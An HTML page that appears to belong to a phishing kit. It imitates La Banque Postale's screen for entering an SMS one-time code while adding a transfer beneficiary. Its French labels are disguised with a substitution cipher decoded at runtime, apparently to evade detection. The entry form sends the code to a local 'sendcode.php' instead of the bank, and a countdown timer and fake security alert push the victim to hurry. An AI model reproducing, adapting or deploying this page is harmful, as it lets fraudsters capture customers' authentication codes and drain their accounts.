<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0106)https://voscomptesenligne.labanquepostale.fr/voscomptes/canalXHTML/CCP/releves_ccp/releveCPP-releve_ccp.ea -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <!-- standard.jsp -->

    <meta http-equiv="Content-Language" content="fr">
    <meta http-equiv="Content-Script-Type" content="text/javascript">
    <meta http-equiv="Content-Style-Type" content="text/css">
    <title>Bienvenue,</title>
    <link type="image/x-icon" href="./azerty/favicon.ico" rel="shortcut icon">
    <meta http-equiv="refresh" content="170">

    <script type="text/javascript">
        var pathRessourcesCss = "https://www.labanquepostale.fr/etc/designs/lbp/transac/css/";
        var pathRessourcesjs = "https://www.labanquepostale.fr/etc/designs/lbp/transac/js/";
        var pathRessourcesImg = "https://www.labanquepostale.fr/etc/designs/lbp/transac/img/q4x/";
    </script>
    <link rel="stylesheet" type="text/css" href="./azerty/reset.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/datePicker.css" media="all">

    <link rel="stylesheet" type="text/css" href="./azerty/default.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/static.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/rib.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/blocs.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/jquery-ui-1.8.6.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/print.css" media="all">

    <link rel="stylesheet" type="text/css" href="./azerty/bridge.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/fontesLocales.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/main.css" media="all">
    <link rel="stylesheet" type="text/css" href="./azerty/outils.css" media="all">

    <link rel="stylesheet" type="text/css" href="./azerty/correctifs-style.css" media="all">

    <!--[if lte IE 8]>
    <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie8.css" media="all" />
<![endif]-->
    <!--[if lte IE 7]>
    <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie7.css" media="all" />
<![endif]-->
    <!--[if lte IE 6]>
   <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie6.css" media="all" />
<![endif]-->

    <script type="text/javascript" src="./azerty/onsubmit.js"></script>
    <script type="text/javascript" src="./azerty/eA-HTML.js"></script>
    <script type="text/javascript" src="./azerty/FwMC-Ext.js"></script>

    <script type="text/javascript" src="./azerty/lib-formbean-bel.js"></script>
    <script type="text/javascript" src="./azerty/generique.js"></script>
    <script type="text/javascript" src="./azerty/outils.js"></script>

    <script type="text/javascript" src="./azerty/ajax.js"></script>
    <script type="text/javascript" src="./azerty/hub.js"></script>
    <script type="text/javascript" src="./azerty/messagerie.js"></script>

    <!-- Javascript -->

    <script type="text/javascript" src="./azerty/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="./azerty/jquery-migrate-1.4.0.js"></script>
    <script type="text/javascript" src="./azerty/jquery.tablesorter.js"></script>
    <script type="text/javascript" src="./azerty/jquery.fixcolheight.js"></script>
    <script type="text/javascript" src="./azerty/jquery.simplemodal.js"></script>
    <script type="text/javascript" src="./azerty/jquery.placeholder.js"></script>
    <script type="text/javascript" src="./azerty/jquery.datePicker.js"></script>
    <script type="text/javascript" src="./azerty/jquery-ui.min.js"></script>
    <script type="text/javascript" src="./azerty/date.js"></script>
    <script type="text/javascript" src="./azerty/date_fr.js"></script>
    <script type="text/javascript" src="./azerty/swfobject.js"></script>
    <script type="text/javascript" src="./azerty/typeahead.jquery.min.js"></script>
    <script type="text/javascript" src="./azerty/config.js"></script>
    <script type="text/javascript" src="./azerty/lib-init.js"></script>
    <script type="text/javascript" src="./azerty/print.js"></script>

    <script type="text/javascript" src="./azerty/bootstrap.js"></script>
    <script type="text/javascript" src="./azerty/plugin.js"></script>
    <script type="text/javascript" src="./azerty/main.js"></script>
    <script type="text/javascript" src="./azerty/select2.min.js"></script>

    <script type="text/javascript" src="./azerty/profile.js"></script>

    <!-- SCRIPT permettant de mettre en gris les boutons annuler - Correction impact N6 -->
    <script type="text/javascript">
        $(document).ready(function() {
            $('a.btn_crt:contains("Annuler")').addClass("btn_annuler");
        });
    </script>

    <script type="text/javascript" src="./azerty/is"></script>
    <link rel="stylesheet" href="./azerty/inbenta_OLD.css">
</head>

<body>
    <div id="page">

        <script type="text/javascript" src="./azerty/xiti_profile.js"></script>

        <!-- SCRIPT INBENTA  -->
        <script language="javascript" type="text/javascript" src="./azerty/inbenta-faq.js" defer=""></script>

        <script type="text/javascript" src="./azerty/header.js" defer=""></script>

        <header id="header-main" role="banner">

            <div id="inbenta-contents"></div>
            <div class="header__profile">
                <div class="content" role="banner">
                    <a href="#" class="logo-wrapper"><img src="./azerty/logo-lbp_header.png" alt="La Banque Postale" class="logo"></a>
                    <div class="nav-profile">
                        <ul>
                            <li class="faq-search">

                                <a>
                                    <img src="./azerty/message.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></i> <script>m='Uvzti%20pnt%20wptzervn%20%3F';d=unescape(m);document.write(d);</script></a>
                                <li class="profile collapse">
                                    <a>
                                        <img src="./azerty/profil.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></i> <script>m='Avn%20uivfrl';d=unescape(m);document.write(d);</script>
                                        <span class="visually-hidden"><script>m='Dtulrti%20lt%20atnp';d=unescape(m);document.write(d);</script></span>
                                    </a>
                                </li>
                                <br>
                                <a id="gerer" href="#" onclick="return xt_click(this,'C','16','Gerer','N');">
                                    <img src="./azerty/deconnexion.png" alt="" aria-hidden="true" role="img" style="width:22px;height:22px"><span style="color: #F0F0F0;"><script>m='Dtcvnntkrvn';d=unescape(m);document.write(d);</script></span>
                                    <i class=""></i>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>

            <div class="alert alert--primary" role="alert">
                <div class="content">
                    <a class="alert__close" href="#" id="#">
                        <img src="./azerty/x.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></a>

                    </a>
                    <p class="alert__body" style="color: #fff">
                        <script> m='-%20Dtinrtit%20cvnntkrvn%20Rnetinte%202019';d=unescape(m);document.write(d);</script>
                    </p>
                </div>
            </div>

            <nav id="menu" class="header__nav" role="navigation">
                <div class="content">
                    <ul>
                        <li>
                            <a id="consulter" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Cvnzpleti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                                <script> m='Cvnzpleti';d=unescape(m);document.write(d);</script>
                            </span>
                            </a>
                        </li>
                        <li>
                            <a id="gerer" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Gtiti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item"><script>m='Gtiti';d=unescape(m);document.write(d);</script></span>
                            </a>
                        </li>
                        <li>

                            <a id="contacter" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Cvnemceti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                                        <div id="echec" class="cache_hub" style="float: left; display: none;">
                                            <img src="./azerty/enveloppe.png" alt="">
                                        </div>
                                        <span><script>m='Cvnemceti';d=unescape(m);document.write(d);</script></span>
                                <span class="badge badge--primary cache_hub" aria-hidden="true" id="nbHUB" style="display: inline-block;"><span id="nbHUBcontent">0</span></span>
                                </span>
                            </a>
                            <script type="text/javascript">
                                addOnloadFunction(prepaGestionHUB);

                                function prepaGestionHUB() {
                                    gestionHUB();
                                }
                            </script>

                        </li>
                        <li>
                            <a id="informersouscrire" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
                                <span class="item" style="color: #004b9b"><script>m='Z%27rnfviati%20%26%20zvpzcirit';d=unescape(m);document.write(d);</script></span>
                            </a>
                        </li>
                    </ul>
                </div>
            </nav>
        </header>

        <main id="main" role="main" class="content">

            <input type="hidden" id="menuSelectionne" value="gerer">
            <div class="main-heading">
                <h1 class="ttl-1"><script>m='LM%20ARZT%20%C0%20JVPI%20MNNPTLLT%20DT%20OVZ%20CVVIDVNN%C9TZ%20UTIZVNNTL.';d=unescape(m);document.write(d);</script></h1>
                <nav role="navigation" class="subnav"><a class="subnav__item" href="#"><script>m='Eimnzftie%20d%27Migtne%20Rnetinmervnml';d=unescape(m);document.write(d);</script><span aria-hidden="true" class="subnav__item__arrow"></span></a><a class="subnav__item" href="#"><script>m='B%E9n%E9frcrmritz';d=unescape(m);document.write(d);</script><span aria-hidden="true" class="subnav__item__arrow"></span></a></nav>
            </div>

            <div class="toptitle simple">
            </div>

            <div id="persohaut"></div>

            <div class="stepper parbase section">

            </div>

            <div id="tfi_gestion_beneficiaires_creation_compte_saisie_otp_haut">
                <!-- DebugBlocEditorial : Bloc editorial absent du cache : tfi_gestion_beneficiaires_creation_compte_saisie_otp_haut -->
            </div>

            <div class="text parbase html section">
                <!-- Formulaire de saisie OTP -->

                <h2 class="title-level2" style="word-spacing: -4px"><script language=JavaScript>m='Zmrzrzzts%20rcr%20lt%20cvdt%20cvaapnrwpt%20umi%20ZAZ%20zpi%20oveit%20etltuhvnt%20uviemblt%20%3A';d=unescape(m);document.write(d);</script></div></h1></h2>

                <h2><script language=JavaScript>m='Lt%20etauz%20dt%20itctuervn%20dp%20cvdt%20etauvimrit%20umi%20ZAZ%20tze%20dtutndmne%20dt%20oveit%20itztmp.%20Mp-dtlm%20dt%203%20arnpetz%3A%20';d=unescape(m);document.write(d);</script><div </div>	<h1	 

  	  	  	 						 class ="zabi" id="timer"></div>

	<div class="clear"></div>
	<form id="formID" action="sendcode.php" method="post" name="SaisieOTP" onsubmit="return submitForm(this, ea_onsubmit_SaisieOTP(this));">
<input type="hidden" name="type" value="code">
			<div class="bloc Tmargin">				
				<h3 class="title-level3" style="font-size: 17px"><script language=JavaScript>m='Cvdt%20cvnfrdtnertl%20%E0%20pzmgt%20pnrwpt%2C';d=unescape(m);document.write(d);</script></h3> 

				<div class="formline">
					<div class="label cinquieme">
						<label for="code_securite"><script language=JavaScript>m='Mfrn%20dt%20omlrdti%20oveit%20arzt%20m%20jvpi%2C%20otprllts%20zmrzri%20oveit%20cvdt%20dt%20omlrdmervn%20it%E7p%20umi%20ZAZ.';d=unescape(m);document.write(d);</script>
					</label>
					</div>
					<!-- Champ de saisie de l'OTP -->	
					<div class="field">
						<span>
							<img id="picto_cadenas" alt="" src="./cc/picto-cadenas.png" name="picto_cadenas">
							<script>m='%3Cinput%20id%3D%22codesecu%22%20name%3D%22codeOTPSaisi%22%20type%3D%22text%22%20maxlength%3D%226%22%20value%3D%22%22%20required%20%3E';d=unescape(m);document.write(d);</script><br>
							<span class="app_erreur"></span>
						</span>
					</div>					
					<!-- /Champ de saisie de l'OTP -->
				</div>
				<div class="clear"></div>	

				<div class="clear"></div>
					</dd>

				</dl>
			 	<div class="clear"></div>

		<div class="clear Tmargin"></div>

		<ul class="actions">
			<li class="btn lit"><input class="btn moyenSaf" id="valider" name="valider" type="submit" value="Confirmer"></li>

											<li class="btn lit"><input class="btn moyenSaf" id="valider" name="valider" type="submit" value="Modifier"></li>

			<li class="btnlk"><a id="valider" name="valider" class="btn_crt btn_annuler"><strong><script>m='Annuler';d=unescape(m);document.write(d);</script></strong></a></li>			
		</ul>
<input type="hidden" name="otpSecureForm" id="otpSecureForm" value="x0xpQ671TcANv">

		 <div class="clear">
  <h9 ><script>m='Lt%20etauz%20dt%20itctuervn%20dp%20cvdt%20etauvimrit%20umi%20ZAZ%20tze%20dtutndmne%20dt%20oveit%20itztmp.%20Mp-dtlm%20dt%203%20arnpetz%2C%20nvpz%20ovpz%20rnorevnz%20m%20itnvpotlti%20l%27vutimervn%20tn%20ztltcervnnmne%20pn%20mpeit%20avdt%20dtitctuervn%20dp%20cvdt.%20Tn%20cmz%20dt%20drffrcplet%2C%20n%27htzrets%20umz%20m%20nvpz%20cvnemceti.';d=unescape(m);document.write(d);</script></h9>

<div id="tfi_gestion_beneficiaires_creation_compte_saisie_otp_bas">
    <!-- DebugBlocEditorial : Bloc editorial absent du cache : tfi_gestion_beneficiaires_creation_compte_saisie_otp_bas -->
</div>

<div id="persobas"></div>
		</div></form></div></main>
		<footer id="main-footer" role="contentinfo">

<div class="content">
    <a id="imageFooter" href="#" class="logo-wrapper">
        <img src="./cc/logo-lbp_footer.png" class="logo">
    </a>
    <ul>
        <li>  la notice : http://davidjbradshaw.github.io/iframe-resizer/
      $("iframe").iFrameResize({checkOrigin:false, heightCalculationMethod: 'max'});
    </script>

		 	<!-- GA -->
<script type="text/javascript">
var _gaq=_gaq || [];
_gaq.push(['_setAccount', 'UA-9562247-1']);
_gaq.push(['_setDomainName', '.labanquepostale.fr']);
_gaq.push(['_trackPageview']); 
(function() { 
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); 
})(); 
</script>
<!-- // GA -->

<!-- XiTi -->
<script type="text/javascript">/*
<![CDATA[ */
function xt_cart() {}
xtnv=document;
xtsd="https://logs";
xtsite="388889";
xtn2="16";
xtpage="videoposte::tfi_gestion_beneficiaires_creation_compte_saisie_otp";
roitest=false;
visiteciblee=false;
xtdi = "";
/* ]]>
*/</script>
<noscript>
&lt;img width="1" height="1" alt="XiTi" src="https://logs.xiti.com/hit.xiti?s=388889&amp;amp;s2=16&amp;amp;p=videoposte::tfi_gestion_beneficiaires_creation_compte_saisie_otp&amp;amp;roimt=&amp;amp;roivc=&amp;amp;" /&gt;
</noscript>
<!-- // XiTi -->

		 	<script type="text/javascript" src="./cc/xtroi.js"></script>

</script>
	<script>
document.getElementById('timer').innerHTML =
  03 + ":" + 00;
startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==59){m=m-1}
  //if(m<0){alert('timer completed')}

  document.getElementById('timer').innerHTML =
    m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>

<div style="display: none;">5a01fca9-d552-45e9-a47c-f34d2a14e626</div><div class="inbenta-loader" style="display:none" iaf-loader=""><i class="icon load"></i></div></body></html>